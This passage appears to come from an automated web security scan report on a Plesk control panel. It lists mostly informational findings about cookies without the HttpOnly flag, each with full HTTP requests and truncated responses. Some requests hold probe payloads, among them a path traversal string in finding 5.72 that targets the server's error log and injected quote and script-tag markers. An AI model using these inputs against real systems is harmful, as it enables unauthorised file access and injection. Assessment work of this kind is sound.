Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=xvrjftqfoptegfsokqpykqdf; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 23:02:50 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 23:02:50 GMT
Connection: close
Content-Length: 20595

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.65. https://50.22.21.242:8443/admin/update/settings/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/update/settings/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/update/settings/ HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/smb/admin-home
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; psaContext=personal-info; locale=en-US; sessionID=xvrjftqfoptegfsokqpykqdf

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 22:57:31 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 22:57:31 GMT
Content-Length: 19705

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.66. https://50.22.21.242:8443/admin/update/settings/e647e%22a%3d%22b%22c3c736922d6  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/update/settings/e647e%22a%3d%22b%22c3c736922d6

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/update/settings/e647e%22a%3d%22b%22c3c736922d6 HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/?start_page=%2Fadmin%2Fupdate%2Fsettings%2Fe647e%2522a%253d%2522b%2522c3c736922d6
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 23:36:58 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 23:36:57 GMT
Content-Length: 11078

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.67. https://50.22.21.242:8443/admin/update/settings/e647e%22a%3d%22b%22c3c736922d649560ed53f10167ff175bf77  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/update/settings/e647e%22a%3d%22b%22c3c736922d649560ed53f10167ff175bf77

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/update/settings/e647e%22a%3d%22b%22c3c736922d649560ed53f10167ff175bf77 HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/?start_page=%2Fadmin%2Fupdate%2Fsettings%2Fe647e%2522a%253d%2522b%2522c3c736922d649560ed53f10167ff175bf77
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 23:39:37 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 23:39:37 GMT
Content-Length: 11078

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.68. https://50.22.21.242:8443/admin/webmail/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/webmail/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/webmail/ HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/smb/settings/tools
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:15:27 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=tools; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 01:15:26 GMT
Content-Length: 19763

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.69. https://50.22.21.242:8443/admin/webmail/enable  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/webmail/enable

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/webmail/enable HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=ouhymmzgtdaqakoglnanbrbl; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; psaContext=deleted

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 13:49:24 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=health; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 13:49:25 GMT
Connection: close
Content-Length: 9729

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

5.70. https://50.22.21.242:8443/filemanager/getimg.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /filemanager/getimg.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /filemanager/getimg.php HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=ouhymmzgtdaqakoglnanbrbl; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 00:14:05 GMT
Connection: close
Content-Length: 19209

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.71. https://50.22.21.242:8443/get_password.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /get_password.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /get_password.php HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/login_up.php3
Cookie: PLESKSESSID=39139572be0e1777a54c9a9ae93f2e91; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 20:33:56 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 20:33:56 GMT
Connection: close
Content-Length: 4653

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

5.72. https://50.22.21.242:8443/help.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /help.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /help.php?context=../../../../../../../../../../etc/httpd/logs/error.log HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 05:06:49 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=homec8ffe%3C%2Fscript%3Ebfc8c185c3e; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Content-Length: 9037

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

5.73. https://50.22.21.242:8443/left.php3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /left.php3

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /left.php3 HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; psaContext=dashboard; locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 22:53:47 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=personal-info; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 22:53:47 GMT
Content-Length: 20278

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

5.74. https://50.22.21.242:8443/login_up.php3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /login_up.php3

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login_up.php3 HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/
Cookie: PLESKSESSID=2b487a11e38efdea41e954b30502b2e0; psaContext=dashboard; locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 22:51:41 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Plesk: PSA-Key/PLSK016937440000
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 22:51:41 GMT
Content-Length: 5081

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

5.75. https://50.22.21.242:8443/logout.php3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /logout.php3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /logout.php3 HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/smb/admin-home
Cookie: PLESKSESSID=5096b6b7563a9a7b025229ead64eb1da; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 22:33:17 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: no_frames=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Set-Cookie: no_frames_login_page=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Set-Cookie: no_frames_logout_page=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Set-Cookie: no_frames_root_page=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Set-Cookie: phpMyAdmin=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT
Set-Cookie: locale=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 22:33:16 GMT
Content-Length: 1216


       <html><head>
       <meta charset="utf-8">
       <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
       <title></title>
       <script src="/javascript/common.js?plesk_version=psa-10.4.4-20111103.
...[SNIP]...

5.76. https://50.22.21.242:8443/plesk/actionlog/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/actionlog/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/actionlog/ HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/smb/settings/tools
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:20:50 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=tools; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 01:20:49 GMT
Content-Length: 36371

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.77. https://50.22.21.242:8443/plesk/admin-alias@/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/admin-alias@/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/admin-alias@/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/smb/redirect/pleskin/root/?dst=%2Fplesk%2Fadmin-alias%40%2F&src=%2Fsmb%2Fsettings%2Ftools&srcController=SettingsController
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=ouhymmzgtdaqakoglnanbrbl; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:43:34 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 01:43:34 GMT
Connection: close
Content-Length: 18133

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.78. https://50.22.21.242:8443/plesk/admin-info/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/admin-info/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/admin-info/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
